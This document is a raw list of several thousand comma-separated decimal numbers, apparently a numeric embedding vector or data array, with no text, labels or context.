0.022339237853884697, -0.0003992081037722528, 0.016108764335513115, -0.0026118378154933453, 0.00013998502981849015, 0.018355820327997208, 0.02711058408021927, 0.011067480780184269, -0.008864197880029678, 0.029912108555436134, -0.007529096677899361, -0.021084388718008995, 0.01405139546841383, 0.0242215134203434, 0.0036113399546593428, -0.04143921658396721, -0.0035000815987586975, 0.029401414096355438, 0.01216182578355074, 0.02073419839143753, -0.013912778347730637, -0.005190845113247633, 0.024703023955225945, -0.0068761371076107025, -0.01217641681432724, -0.004537886008620262, -0.005063171498477459, -0.023667044937610626, 0.020456964150071144, 0.016298452392220497, -0.038375046104192734, 0.0026665551122277975, -0.008871493861079216, -0.008572372607886791, -0.005836509168148041, 0.009425962343811989, 0.004745811689645052, -0.002516994485631585, -0.02398805320262909, 0.011023706756532192, -0.02203282155096531, 0.009287345223128796, 0.0028981915675103664, 0.005464431829750538, -0.005869339685887098, -0.0070329937152564526, 0.01526247151196003, -0.01619631238281727, -0.010542194359004498, -0.0485013909637928, 0.041818588972091675, 0.0006816860404796898, 0.02534504048526287, -0.025739004835486412, 0.029882926493883133, -0.010542194359004498, 0.00751450564712286, -0.002765046199783683, 0.004833359271287918, -0.01977117545902729, 0.018866516649723053, -0.022776976227760315, 0.0012876797700300813, -0.0314587838947773, -0.015846122056245804, -0.012781955301761627, -0.04018436372280121, 0.010374395176768303, 0.0018001982243731618, 0.0087766507640481, -0.016809146851301193, -0.020850928500294685, -0.0679953321814537, 0.005479022860527039, 0.00963753554970026, 0.012460947036743164, 0.017407389357686043, 0.010075273923575878, 0.016779962927103043, -0.019289663061499596, -0.009754265658557415, -0.0020883758552372456, 0.005913113243877888, -0.008448346517980099, 0.008878789842128754, 0.009549988433718681, -0.00020689968368969858, 0.05066090077161789, -0.02130325883626938, -0.004796880763024092, 0.002257999498397112, 0.007113245315849781, -0.019158340990543365, 0.02471761591732502, -0.013934665359556675, -0.010038795880973339, 0.023068802431225777, -0.0039943610318005085, -0.008601555600762367, 0.0011116726091131568, 0.001387994852848351, 0.013810639269649982, -0.023404400795698166, -0.013963848352432251, 0.006266951560974121, 0.017626257613301277, -0.050981905311346054, 0.022339237853884697, -0.027986060827970505, -0.014686116017401218, -0.010126342996954918, -0.007711487822234631, 0.012796546332538128, 0.019070792943239212, 0.011548992246389389, 0.03662409633398056, -0.04044700786471367, -0.0004637288802769035, 0.0038995177019387484, 0.020311051979660988, -0.012621451169252396, -0.007572870701551437, -0.0015676498878747225, 0.027212724089622498, -0.016006626188755035, 0.013591771014034748, 0.028438391163945198, 0.025490952655673027, 0.0315755158662796, -0.00230542104691267, 0.008966336958110332, -0.05746043100953102, 0.035048238933086395, 0.020850928500294685, -0.008703694678843021, 0.038170769810676575, 0.007733374368399382, -0.0546005442738533, 0.006256008055061102, 0.015233288519084454, 0.005347701255232096, 0.037674665451049805, -0.01724688522517681, -0.029080405831336975, -0.011417671106755733, 0.01815154403448105, -0.01820990815758705, -0.01418271753937006, -0.03595289587974548, -0.01401491742581129, 0.03472723066806793, -0.0187789686024189, -0.028175747022032738, -0.04003845155239105, -0.02703762799501419, -0.002673850627616048, 0.058248359709978104, -0.04820956662297249, 0.028380025178194046, 0.017728395760059357, -0.014044100418686867, -0.004669207148253918, 0.008535894565284252, 0.002325484063476324, -0.02641020342707634, -0.005810974165797234, -0.011797044426202774, 0.006183051969856024, -0.015364610590040684, -0.03580698370933533, 0.00901011098176241, -0.0006224089884199202, -0.034289490431547165, -0.022353829815983772, -0.00587298721075058, 0.021026024594902992, 0.012315033935010433, 0.0010441879276186228, 0.02929927594959736, -0.0351066030561924, -0.029868334531784058, 0.014956054277718067, 0.027854740619659424, 0.010323325172066689, 0.02800065279006958, 0.019523123279213905, 0.0033997665159404278, -0.029270093888044357, 0.025126172229647636, -0.010177413001656532, 0.009579170495271683, 0.011337419040501118, -0.029912108555436134, -0.006960037164390087, -0.020019225776195526, -0.0133510148152709, 0.0071241888217628, -0.0003723054542206228, 0.012657929211854935, 0.02627888321876526, 0.021317848935723305, -0.0022963015362620354, 0.01729065738618374, 0.014357812702655792, -0.017626257613301277, 0.0032775646541267633, 0.013263466767966747, -0.0073904795572161674, 0.01084861159324646, 0.01343856193125248, 0.00836079940199852, -0.002573535777628422, -0.02643938548862934, 0.022047413513064384, 0.01867682859301567, 0.00029889310826547444, 0.008616146631538868, 0.02153671905398369, -0.02657070755958557, -0.008579668588936329, -0.022149551659822464, 0.043744634836912155, 0.013613657094538212, -0.01891028881072998, -0.01320510171353817, 0.01025036908686161, -0.014007621444761753, 0.008616146631538868, -0.009564579464495182, -0.005176254082471132, -0.012037799693644047, -0.002755926689133048, 0.012847615405917168, 0.0001618719397811219, -0.03892951458692551, 0.001509284833446145, -0.03554433956742287, -0.02398805320262909, -0.012716294266283512, 0.0015448509948328137, 0.0038484481628984213, -0.050806812942028046, -0.012811137363314629, 0.009433258324861526, 0.014700707048177719, -0.004523294512182474, -0.027446184307336807, -0.0005786351393908262, -0.02620592527091503, -0.010476534254848957, -0.013796048238873482, -0.010761063545942307, 0.022704020142555237, -0.012650633230805397, -0.005037636961787939, 0.026293473318219185, 0.0023273080587387085, -0.0012876797700300813, -0.003538383636623621, 0.017932673916220665, 0.0020081240218132734, 0.00006771262269467115, -0.026979263871908188, -0.006380034144967794, 0.03142959997057915, -0.024133965373039246, 0.00014693867706228048, -0.012650633230805397, 0.050339892506599426, 0.006394625175744295, 0.008718285709619522, -0.009280049242079258, -0.002963852370157838, 0.014627750962972641, -0.030466577038168907, -0.0060699693858623505, 0.008550485596060753, 0.008134634234011173, 0.00987099576741457, -0.0036076921969652176, 0.00902470201253891, -0.000520726025570184, 0.029182545840740204, 0.009717787615954876, -0.015087376348674297, 0.01084861159324646, 0.017261475324630737, -0.03002883866429329, -0.0254763625562191, 0.0016643170965835452, -0.008601555600762367, 0.008404573425650597, 0.011519810184836388, 0.012898685410618782, 0.028482165187597275, 0.013372901827096939, -0.04488275572657585, -0.02336062863469124, -0.017874309793114662, -0.031108593568205833, -0.017494935542345047, 0.00048470383626408875, -0.012964345514774323, -0.026950079947710037, 0.03831668198108673, -0.024309059605002403, -0.006989219691604376, 0.01152710523456335, 0.0026191335637122393, 0.021347032859921455, 0.012395286001265049, -0.021624267101287842, -0.014175421558320522, -0.019493941217660904, 0.018399594351649284, -0.05264531075954437, -0.013095667585730553, -0.010790246538817883, -0.009046589024364948, -0.008200295269489288, 0.003394294762983918, 0.02372540906071663, 0.02203282155096531, 0.02395886927843094, 0.014729890041053295, -0.007076767273247242, -0.03998008742928505, -0.005409714300185442, 0.015350018627941608, -0.03102104552090168, 0.006318021100014448, 0.03484395891427994, -0.002876304555684328, -0.008302434347569942, -0.04660452529788017, 0.009922065772116184, 0.02737322822213173, -0.016167130321264267, 0.021740997210144997, 0.012716294266283512, -0.009666718542575836, 0.004742163699120283, -0.04394891485571861, -0.013000824488699436, -0.01133012305945158, -0.035281699150800705, -0.019260480999946594, -0.037003468722105026, -0.005176254082471132, -0.013941961340606213, 0.0012530256062746048, 0.008689102716743946, -0.014883098192512989, -0.00031029252568259835, 0.013329127803444862, 0.032071616500616074, 0.0056468225084245205, -0.019289663061499596, 0.01313944160938263, 0.0019442870980128646, -0.0007687776815146208, 0.023200124502182007, -0.011665722355246544, 0.03857932612299919, -0.005883930716663599, -0.006679154932498932, -0.0005932264612056315, -0.011490627191960812, 0.02607460506260395, -0.0284675732254982, -0.004909963347017765, -0.0036587617360055447, -0.003191840834915638, 0.016283860430121422, 0.005745313595980406, -0.006179403979331255, -0.0005603960598818958, 0.03490232303738594, 0.015773165971040726, 0.0005316695314832032, 0.016298452392220497, 0.033618293702602386, 0.0009684957331046462, -0.025067806243896484, -0.039396435022354126, 0.023346036672592163, -0.034552134573459625, -0.03615717217326164, -0.0036642334889620543, 0.03706183284521103, -0.03496069088578224, -0.0007892966386862099, 0.006887080613523722, 0.005179902072995901, 0.0017491288017481565, 0.020588286221027374, -0.011089367792010307, 0.012767363339662552, -0.021405396983027458, -0.005679653026163578, -0.02289370633661747, 0.04818038269877434, 0.005668709520250559, -0.025972465053200722, -0.003790083108469844, 0.0010405401699244976, -0.024309059605002403, 0.0018229971174150705, -0.006299782078713179, -0.005179902072995901, -0.010038795880973339, 0.0010295966640114784, -0.01834123022854328, -0.013642840087413788, -0.026658255606889725, -0.0024586294312030077, 0.022966664284467697, 0.018822742626070976, 0.015904488041996956, 0.005883930716663599, 0.010564081370830536, 0.006843307055532932, -0.03659491240978241, 0.017991039901971817, -0.0200046356767416, 0.01028684712946415, -0.013132145628333092, -0.007011106703430414, -0.007762557361274958, -0.019829539582133293, 0.003790083108469844, -0.001031420542858541, 0.007959539070725441, -0.02713976800441742, 0.009995021857321262, 0.007813626900315285, -0.01708638109266758, 0.015539705753326416, -0.0026501398533582687, -0.014190012589097023, -0.019887905567884445, -0.002022715285420418, -0.03326810151338577, -0.003866687184199691, 0.0065441858023405075, 0.022120369598269463, 0.08562158793210983, -0.015233288519084454, -0.021784769371151924, -0.015568887814879417, -0.0076093487441539764, 0.0023473710753023624, -0.023900505155324936, -0.003514672862365842, -0.013642840087413788, -0.011665722355246544, 0.028511347249150276, 0.008871493861079216, 0.005694244056940079, -0.000692173489369452, -0.0017628081841394305, 0.005887578707188368, -0.0030732867307960987, 0.0016925876261666417, 0.009943952783942223, 0.008229478262364864, -0.0017299777828156948, 0.003939643502235413, 0.024863528087735176, -0.0026501398533582687, 0.020456964150071144, -0.02117193676531315, -0.02859889529645443, -0.020354826003313065, -0.03177979215979576, -0.027489958330988884, -0.0062888385728001595, 0.004494111984968185, -0.005479022860527039, 0.009447849355638027, -0.00015047250781208277, -0.009951247833669186, 0.0163276344537735, -0.010753768496215343, -0.009593761526048183, -0.02557850070297718, 0.015481340698897839, -0.003935995977371931, -0.010243073105812073, -0.010162821970880032, 0.00850671250373125, -0.02130325883626938, 0.019829539582133293, -0.008915267884731293, -0.009936656802892685, 0.012563086114823818, -0.0011937485542148352, -0.019099976867437363, 0.007386832032352686, -0.0011618301505222917, -0.003910460975021124, 0.02252892591059208, 0.02133244089782238, 0.004060021601617336, -0.005924056749790907, 0.002553472761064768, -0.018793558701872826, 0.018837332725524902, -0.0004058197664562613, -0.026118379086256027, 0.004092852119356394, -0.00854319054633379, -0.006048082374036312, 0.006733872462064028, -0.02945978008210659, 0.012818433344364166, 0.012169121764600277, 0.011432262137532234, -0.019581487402319908, -0.008535894565284252, 0.008448346517980099, 0.02945978008210659, -0.0006812300416640937, 0.00588028272613883, -0.006934502627700567, -0.03423112630844116, 0.013066484592854977, 0.03685755655169487, -0.02099684067070484, 0.03195488825440407, -0.004847950302064419, 0.012942459434270859, -0.0230542104691267, -0.003760900581255555, 0.00774796586483717, -0.0030732867307960987, 0.007160667330026627, -0.015554296784102917, 0.014204603619873524, -0.012935163453221321, 0.01857469044625759, 0.029678648337721825, 0.009250867180526257, -0.009061180055141449, -0.01356988400220871, 0.006722928956151009, 0.0028343547601252794, 0.0005654118140228093, 0.021215710788965225, -0.007689600810408592, -0.013796048238873482, 0.007835513912141323, 0.006281543057411909, 0.037937309592962265, -0.02929927594959736, -0.00819299928843975, -0.03583616763353348, -0.023944279178977013, 0.017334431409835815, -0.043511174619197845, 0.00035224243765696883, 0.022105777636170387, 0.018822742626070976, -0.025388814508914948, -0.012599564157426357, -0.01596285216510296, -0.023871323093771935, -0.022908298298716545, 0.032626084983348846, -0.011534401215612888, 0.0054060667753219604, 0.013030006550252438, -0.015174923464655876, -0.022339237853884697, 0.046662889420986176, 0.02338981069624424, 0.021770179271697998, 0.017159337177872658, -0.007733374368399382, -0.016663232818245888, 0.0013414851855486631, -0.02713976800441742, 0.006474877241998911, -0.0012967993970960379, -0.005384179763495922, 0.0022744147572666407, -0.039367254823446274, 0.009360301308333874, 0.03376420587301254, 0.003222847357392311, 0.008820424787700176, 0.004257003776729107, -0.015452157706022263, 0.0043956208974123, 0.01048382930457592, 0.015612661838531494, -0.002194162691012025, -0.03606962785124779, 0.003450836054980755, 0.009396779350936413, 0.004129330161958933, 0.007696896325796843, 0.015948262065649033, -0.026556115597486496, -0.0015484988689422607, 0.002956556621938944, -0.008280547335743904, 0.006781294010579586, 0.003211903851479292, -0.013759570196270943, 0.012037799693644047, 0.02263106405735016, 0.04070965200662613, -0.0242506954818964, -0.028686441481113434, -0.012212895788252354, -0.003390647005289793, 0.014328629709780216, -0.01834123022854328, 0.010505716316401958, 0.011687609367072582, 0.01791808381676674, -0.040125999599695206, 0.02385673113167286, 0.015350018627941608, -0.017670031636953354, -0.004782289732247591, 0.024834346026182175, -0.00627789506688714, -0.003470899071544409, -0.004920906852930784, -0.012533903121948242, -0.0001797690347302705, 0.0013487808173522353, -0.031896524131298065, 0.032830365002155304, -0.0009557283483445644, 0.025855734944343567, 0.00008161993173416704, -0.018822742626070976, -0.004986567422747612, -0.026497751474380493, 0.00441385991871357, -0.010046090930700302, 0.004720276687294245, 0.006241417024284601, 0.013226988725364208, -0.02016513980925083, -0.004745811689645052, -0.023710818961262703, 0.0041220346465706825, -0.018399594351649284, 0.0070038107223808765, -0.003939643502235413, -0.0023364275693893433, -0.009630240499973297, 0.005971478298306465, 0.020150547847151756, 0.015204106457531452, 0.0015904487809166312, -0.0020847280975431204, -0.024338243529200554, -0.016283860430121422, 0.002998506650328636, -0.008915267884731293, 0.005770848598331213, 0.0045087034814059734, 0.019158340990543365, -0.0017664559418335557, 0.018793558701872826, 0.0019059850601479411, 0.0049683284014463425, 0.045904144644737244, -0.007580166216939688, -0.013000824488699436, 0.017436571419239044, -0.024279877543449402, 0.00542430579662323, 0.004807824268937111, 0.014138943515717983, -0.0000716454305802472, -0.02734404429793358, -0.007229975890368223, -0.006562424823641777, -0.011614653281867504, -0.00859425961971283, -0.003625931218266487, -0.019596079364418983, -0.016006626188755035, 0.0013752274680882692, -0.0032046083360910416, -0.00021408133034128696, 0.0039177569560706615, -0.01729065738618374, 0.0022652950137853622, 0.01708638109266758, -0.013759570196270943, -0.0032611493952572346, -0.01174597442150116, 0.010877793654799461, -0.010097160935401917, -0.002772341948002577, -0.014168125577270985, 0.0033687599934637547, 0.010454647243022919, -0.005074115004390478, 0.018968654796481133, -0.018268274143338203, -0.0009803511202335358, 0.013759570196270943, -0.01207427866756916, 0.0242215134203434, -0.019260480999946594, -0.012760068289935589, 0.03878360241651535, 0.015714799985289574, 0.0012010441860184073, -0.012037799693644047, 0.017173927277326584, -0.02130325883626938, 0.010607855394482613, 0.0035292641259729862, -0.00024052801018115133, 0.0016141595551744103, -0.010359804145991802, -0.005457135848701, 0.00629613408818841, 0.046458613127470016, 0.019654445350170135, -0.014700707048177719, -0.007499914150685072, 0.005325814709067345, -0.01502901129424572, -0.0013515166938304901, -0.0021357976365834475, 0.002006300026550889, -0.005147071555256844, 0.0022014582064002752, -0.005606696475297213, -0.013051893562078476, 0.020792564377188683, -0.001552146626636386, -0.00046236097114160657, 0.016531912609934807, -0.017699213698506355, -0.008229478262364864, 0.005960534792393446, 0.0387544222176075, 0.04269406571984291, -0.00006822559953434393, -0.003314042929559946, -0.0021047911141067743, -0.023900505155324936, -0.0039797695353627205, -0.028584303334355354, -0.0071716103702783585, 0.011388488113880157, 0.014970646239817142, -0.0023364275693893433, -0.0315755158662796, 0.00793035700917244, 0.0023674340918660164, 0.0038557439111173153, 0.011293645016849041, -0.012606860138475895, 0.020179729908704758, 0.006617142353206873, -0.01562725380063057, -0.022412195801734924, 0.006832363549619913, -0.01398573536425829, -0.00034699871321208775, 0.012665225192904472, -0.008689102716743946, -0.016794554889202118, -0.023039620369672775, 0.021974457427859306, 0.010046090930700302, 0.023346036672592163, -0.00935300625860691, -0.008864197880029678, -0.000017840111468103714, 0.00587298721075058, -0.015014419332146645, -0.0036514659877866507, -0.001740921288728714, -0.03828749805688858, 0.01615253835916519, -0.001435416517779231, 0.011811635456979275, 0.023842139169573784, 0.00585474818944931, 0.004111091140657663, -0.01048382930457592, 0.0071716103702783585, -0.03315137326717377, -0.011074775829911232, 0.00009575522562954575, -0.01794726587831974, 0.019362619146704674, 0.014883098192512989, 0.007302931975573301, 0.011009115725755692, -0.014219195581972599, 0.011614653281867504, -0.045437224209308624, -0.011687609367072582, 0.0011262638727203012, -0.003337753703817725, -0.022514333948493004, 0.013839822262525558, -0.007000163197517395, -0.013482335954904556, 0.010491125285625458, 0.011118549853563309, -0.0012967993970960379, -0.018851924687623978, 0.010396282188594341, 0.004271595273166895, 0.0047640507109463215, 0.004278890788555145, 0.007383184041827917, 0.016064992174506187, 0.001156358397565782, -0.009031997993588448, 0.03128368780016899, 0.0010906975949183106, -0.017378205433487892, 0.007740670349448919, 0.011592766270041466, 0.001336925313808024, 0.01612335629761219, -0.007354001514613628, 0.007459788117557764, -0.01127905398607254, 0.015320836566388607, 0.008550485596060753, 0.015452157706022263, 0.037937309592962265, 0.019625261425971985, -0.00459625106304884, -0.0059167612344026566, 0.02026727795600891, 0.0026227813214063644, -0.024104783311486244, -0.012329625897109509, 0.013256171718239784, 0.02531585842370987, -0.028919903561472893, 0.017801353707909584, 0.013394788838922977, 0.016765372827649117, -0.008703694678843021, -0.015919078141450882, 0.0212303027510643, 0.005460783839225769, 0.001189188682474196, -0.006029843352735043, -0.009477031417191029, -0.029474370181560516, -0.0056468225084245205, -0.012803842313587666, -0.001700795255601406, 0.014532907865941525, -0.015087376348674297, 0.02458629384636879, -0.01924588903784752, 0.020092181861400604, -0.024965668097138405, -0.040592920035123825, -0.0006392801296897233, -0.02584114484488964, 0.03032066486775875, -0.0006639029015786946, -0.0037718440871685743, -0.0024148556403815746, 0.010192004032433033, 0.017874309793114662, -0.0006930854870006442, 0.005176254082471132, 0.00120286806486547, 0.0339684821665287, -0.010089864954352379, -0.006343555636703968, -0.041059840470552444, 0.01071728952229023, 0.0363030880689621, -0.02594328299164772, -0.017801353707909584, -0.006051730364561081, -0.008484825491905212, -0.003613163949921727, -0.01443076878786087, -0.0007747053750790656, 0.0025662400294095278, -0.01854550838470459, -0.00671928096562624, 0.016911284998059273, -0.00922168418765068, 0.001425385009497404, 0.0001161032123491168, 0.008572372607886791, -0.0067995330318808556, 0.018034813925623894, -0.012708998285233974, 0.013285353779792786, 0.00940407533198595, -0.004950089380145073, 0.008448346517980099, 0.028292477130889893, 0.0018357645021751523, 0.012023208662867546, -0.007923061028122902, -0.006522298790514469, 0.011191505938768387, -0.018501734361052513, 0.012198303826153278, 0.012497425079345703, 0.018107770010828972, 0.022003639489412308, -0.024469563737511635, -0.017699213698506355, -0.014321334660053253, -0.023097984492778778, 0.01893947273492813, -0.0011071128537878394, 0.002991210902109742, -0.00688343308866024, 0.008659920655190945, 0.009528101421892643, -0.01651732064783573, 0.015116558410227299, -0.002704857150092721, 0.010746472515165806, -0.005055875983089209, 0.018983246758580208, 0.004505055490881205, -0.009885587729513645, 0.00901011098176241, 0.0065587772987782955, -0.008732876740396023, 0.013409379869699478, 0.005420657806098461, 0.0039177569560706615, 0.004844302777200937, -0.018457960337400436, -0.010921567678451538, -0.00836079940199852, -0.0026866181287914515, 0.023710818961262703, -0.009126841090619564, -0.010126342996954918, -0.01927507109940052, -0.004300777800381184, 0.008265956304967403, -0.01133012305945158, 0.0011226159986108541, -0.002630076836794615, -0.0007956803310662508, 0.004475872963666916, -0.016050400212407112, -0.01113314088433981, -0.009046589024364948, -0.011986730620265007, -0.00920709315687418, -0.01187729649245739, -0.006500412244349718, 0.011257166974246502, -0.010702698491513729, -0.011797044426202774, 0.0020756085868924856, 0.014190012589097023, -0.0022908297833055258, 0.007733374368399382, -0.00292372633703053, -0.00035748619120568037, 0.01250472106039524, -0.006974628195166588, -0.008893380872905254, 0.0013806992210447788, 0.0023710818495601416, 0.009644831530749798, 0.00036614976124837995, -0.006471229717135429, -0.012395286001265049, -0.0011244399938732386, 0.005048580467700958, -0.024527929723262787, 0.008090861141681671, 0.017961855977773666, -0.0076604182831943035, -0.01927507109940052, -0.013744979165494442, 0.0008089037146419287, 0.010761063545942307, 0.0011107606114819646, 0.015014419332146645, -0.014270264655351639, -0.008017904125154018, -0.008317025378346443, -0.003474546829238534, -0.013285353779792786, -0.013737683184444904, -0.009965838864445686, -0.009995021857321262, 0.007726078853011131, -0.0061210389249026775, 0.010388986207544804, 0.026964671909809113, 0.0018093178514391184, 0.018428778275847435, 0.014729890041053295, -0.00003616469621192664, 0.01893947273492813, 0.0053148712031543255, -0.016707006841897964, -0.022718612104654312, 0.011738679371774197, -0.0034891380928456783, 0.0012192832073196769, -0.018822742626070976, -0.0035949249286204576, 0.0011964843142777681, -0.03300545737147331, 0.0073503535240888596, -0.0006981011829338968, 0.0175533015280962, 0.010403577238321304, -0.0031498910393565893, 0.011300940997898579, -0.007025697734206915, 0.007959539070725441, 0.011541697196662426, -0.025826552882790565, -0.03318055346608162, -0.01854550838470459, 0.017363615334033966, 0.035048238933086395, -0.018326638266444206, -0.0024914597161114216, -0.008907971903681755, -0.020077591761946678, 0.0020756085868924856, -0.024921894073486328, 0.00043728220043703914, 0.024571703746914864, -0.003957882523536682, 0.01947934925556183, 0.00503398897126317, -0.018093178048729897, 0.0031936648301780224, 0.0002475956571288407, 0.032626084983348846, 0.007281044963747263, -0.007740670349448919, -0.021711813285946846, 0.004990215413272381, -0.0029182545840740204, 0.0004901755601167679, 0.00015058649296406657, -0.002879952546209097, -0.016707006841897964, 0.003366936231032014, 0.02146376296877861, -0.001609599799849093, -0.040125999599695206, 0.011366601102054119, 0.004257003776729107, -0.020880110561847687, 0.005420657806098461, 0.006996515206992626, -0.003645994234830141, 0.01820990815758705, -0.00588028272613883, 0.008681807667016983, -0.00584745267406106, 0.012482834048569202, 0.011381193064153194, -0.004559772554785013, -0.006741167977452278, -0.012037799693644047, 0.03297627717256546, -0.01596285216510296, -0.003837504656985402, 0.005858396179974079, -0.006387329660356045, -0.015204106457531452, -0.01659027673304081, -0.001488309819251299, -0.004833359271287918, -0.013847118243575096, 0.00399800855666399, 0.006777646020054817, 0.005603048950433731, -0.001367931836284697, -0.008134634234011173, 0.0018932176753878593, 0.012803842313587666, 0.017363615334033966, 0.013934665359556675, -0.012439060024917126, -0.03735365718603134, 0.017232293263077736, -0.01066622044891119, 0.007335762493312359, 0.006741167977452278, 0.008448346517980099, 0.01664864271879196, -0.0028690090402960777, 0.006230473518371582, 0.0007263717707246542, 0.014386994764208794, -0.008273251354694366, 0.013372901827096939, 0.0019260479602962732, 0.014999828301370144, -0.015700209885835648, -0.004191343206912279, -0.015641843900084496, -0.01599203422665596, -0.01483202911913395, -0.021259484812617302, -0.015714799985289574, -0.005460783839225769, -0.026235109195113182, -0.008689102716743946, 0.008025200106203556, 0.008331616409122944, -0.004267947282642126, -0.02286452427506447, 0.002553472761064768, -0.026629073545336723, -0.004957384895533323, -0.0011673017870634794, 0.018501734361052513, -0.009914769791066647, 0.011767861433327198, 0.0009967663791030645, 0.011403080075979233, -0.002436742652207613, 0.005340405739843845, -0.032334260642528534, -0.006091856397688389, 0.017597075551748276, 0.00651135528460145, 0.0050193979404866695, 0.013679318130016327, -0.008214886300265789, 0.016298452392220497, -0.00460354657843709, -0.004322664346545935, 0.002540705492720008, 0.007426958065479994, -0.0016451659612357616, 0.00047877614269964397, 0.00262095732614398, 0.012285851873457432, -0.013518813997507095, 0.009732378646731377, 0.00832432135939598, 0.0027212724089622498, 0.009491623379290104, 0.009484327398240566, -0.00901011098176241, 0.027183542028069496, -0.01718851923942566, -0.0039031654596328735, 0.02643938548862934, 0.02166803926229477, -0.016531912609934807, 0.008980927988886833, 0.013329127803444862, -0.031196141615509987, -0.017130155116319656, -0.01549593172967434, -0.004614490084350109, 0.023214714601635933, 0.002651963848620653, 0.023010436445474625, 0.009644831530749798, -0.000025335237296530977, -0.017203111201524734, 0.009148728102445602, 0.00714242784306407, -0.007310227490961552, 0.005712483078241348, 0.03175060823559761, 0.00387763069011271, -0.009717787615954876, 0.014904985204339027, 0.006653620395809412, -0.00029114147764630616, 0.014605863951146603, 0.02929927594959736, -0.015247880481183529, 0.01705719716846943, -0.0007856488227844238, -0.020194321870803833, -0.0016916757449507713, 0.036711640655994415, 0.016298452392220497, -0.009520805440843105, 0.009484327398240566, 0.0017655440606176853, 0.0069673326797783375, -0.012271260842680931, -0.0007487146649509668, 0.0035566226579248905, 0.006941798143088818, 0.037908125668764114, 0.00334687321446836, 0.004184047691524029, 0.006536890286952257, -0.013628249056637287, -0.002617309568449855, -0.0014490957837551832, 0.004027191083878279, -0.0017445690464228392, 0.0230250284075737, -0.020456964150071144, -0.006795885507017374, -0.012256668880581856, 0.005012102425098419, -0.027023037895560265, -0.02388591319322586, -0.015379201620817184, 0.002808819990605116, 0.01237339898943901, -0.02117193676531315, -0.006358147133141756, 0.029678648337721825, 0.006131982430815697, 0.013927370309829712, -0.007357649505138397, 0.008185704238712788, -0.022105777636170387, -0.0034599555656313896, -0.01315403264015913, 0.01297164149582386, 0.017509527504444122, 0.006649972405284643, -0.011840817518532276, -0.024790572002530098, 0.02159508317708969, 0.003542031394317746, -0.011227983981370926, -0.0024185033980757, -0.042022865265607834, -0.0013433090643957257, 0.0009456968400627375, 0.022047413513064384, 0.02036941610276699, -0.0070184022188186646, -0.0023802013602107763, 0.0064311036840081215, -0.006777646020054817, -0.01731984131038189, 0.007871991954743862, -0.031079411506652832, 0.004548829514533281, -0.01984413154423237, 0.0017618961865082383, -0.0036788247525691986, 0.013759570196270943, 0.02810279093682766, -0.01784512586891651, -0.0031936648301780224, -0.005245562642812729, 0.0045305900275707245, -0.014474542811512947, -0.005041284952312708, 0.006617142353206873, 0.020617468282580376, -0.0006347203743644059, -0.012898685410618782, 0.0026537878438830376, -0.015714799985289574, 0.0032046083360910416, -0.015014419332146645, -0.016167130321264267, -0.013650136068463326, -0.0037043592892587185, 0.0048771328292787075, -0.01459856890141964, -0.02568064071238041, 0.035223331302404404, 0.0016624931013211608, -0.007226327899843454, 0.016663232818245888, 0.0052382671274244785, 0.008550485596060753, -0.007251862436532974, -0.004902667831629515, -0.0059167612344026566, 0.0020354825537651777, -0.01984413154423237, -0.011957547627389431, -0.00526015367358923, 0.010316030122339725, -0.0012420821003615856, 0.012402581982314587, -0.004979271907359362, 0.014751777052879333, -0.02922631986439228, -0.023302262648940086, -0.008054382167756557, -0.007726078853011131, 0.0017263299087062478, 0.034026850014925, -0.03008720465004444, 0.0046582636423408985, -0.022806160151958466, -0.013518813997507095, -0.004446690436452627, -0.007602053228765726, -0.0036405224818736315, -0.013941961340606213, 0.0001744113105814904, 0.016415182501077652, 0.008886084891855717, 0.005606696475297213, 0.010337917134165764, 0.006040786858648062, -0.014117056503891945, -0.017757579684257507, 0.006825068034231663, 0.044474199414253235, -0.0009270018199458718, 0.0007227239548228681, 0.005059523973613977, -0.011184210889041424, 0.0009347533923573792, 0.004333607852458954, 0.012628746218979359, -0.024002643302083015, -0.03166306018829346, -0.002086552092805505, -0.012687111273407936, -0.0038046743720769882, 0.038637690246105194, 0.021682631224393845, 0.014773664064705372, 0.005252858158200979, -0.0025388814974576235, 0.0057380180805921555, 0.019420983269810677, 0.00775526138022542, -0.009031997993588448, 0.006624437868595123, 0.023535722866654396, -0.013547996990382671, 0.005030341446399689, -0.006208586506545544, 0.011767861433327198, -0.021390805020928383, 0.015481340698897839, 0.007310227490961552, 0.008433755487203598, -0.008783945813775063, 0.018297456204891205, 0.009564579464495182, -0.00375725282356143, -0.016604868695139885, -0.007445197086781263, -0.006390977650880814, 0.008025200106203556, 0.002504227217286825, 0.027650462463498116, 0.003166306298226118, -0.002456805668771267, 0.0062487125396728516, -0.006383681669831276, 0.001747304922901094, -0.00033719520433805883, 0.0028945438098162413, -0.006792237516492605, -0.02627888321876526, 0.01742197945713997, 0.004472224973142147, 0.007923061028122902, -0.03709101676940918, 0.012008617632091045, 0.004888076335191727, -0.023039620369672775, -0.0133510148152709, -0.0025315857492387295, -0.004366438370198011, -0.006285190582275391, -0.013810639269649982, -0.0187789686024189, -0.006788589525967836, 0.0014527435414493084, -0.0019078089389950037, 0.016473546624183655, 0.0019643499981611967, 0.0022999492939561605, -0.0026993853971362114, 0.005526444409042597, 0.0034253012854605913, -0.0048370067961514, -0.02282075025141239, -0.0017664559418335557, -0.0003675176703836769, 0.0008321585482917726, 0.023594088852405548, -0.05541765317320824, -0.009739674627780914, -0.01940639317035675, 0.01041816920042038, 0.002983915386721492, 0.007354001514613628, -0.011585470288991928, 0.005581161938607693, -0.016546502709388733, 0.007536392193287611, 0.00793035700917244, -0.011548992246389389, -0.018764376640319824, 0.015145741403102875, -0.018837332725524902, -0.011147732846438885, 0.012387990951538086, -0.01272359024733305, -0.0027176246512681246, 0.0013697557151317596, 0.004505055490881205, -0.012278555892407894, 0.01831204816699028, -0.015379201620817184, -0.002123030135408044, -0.019450167194008827, -0.01358447503298521, -0.006865194067358971, -0.008922562934458256, 0.014562089927494526, 0.001848531886935234, 0.001636958448216319, -0.015525114722549915, 0.005063171498477459, 0.008732876740396023, 0.003582157427445054, -0.01834123022854328, 0.005504557862877846, 0.009688605554401875, -0.0020208912901580334, -0.006044434849172831, 0.00004525574331637472, -0.032655268907547, -0.01562725380063057, -0.0016497258329764009, 0.005212732125073671, 0.003613163949921727, -0.02279156818985939, 0.017742987722158432, -0.021872317418456078, 0.01168031431734562, -0.013299944810569286, 0.044911935925483704, -0.027256498113274574, -0.00399800855666399, 0.004242412745952606, 0.00837539043277502, -0.015174923464655876, -0.001176421414129436, -0.0026975616347044706, -0.015700209885835648, 0.01977117545902729, 0.017305249348282814, 0.0036788247525691986, -0.022587290033698082, -0.018239090219140053, -0.014474542811512947, -0.00671928096562624, -0.019785765558481216, -0.005147071555256844, 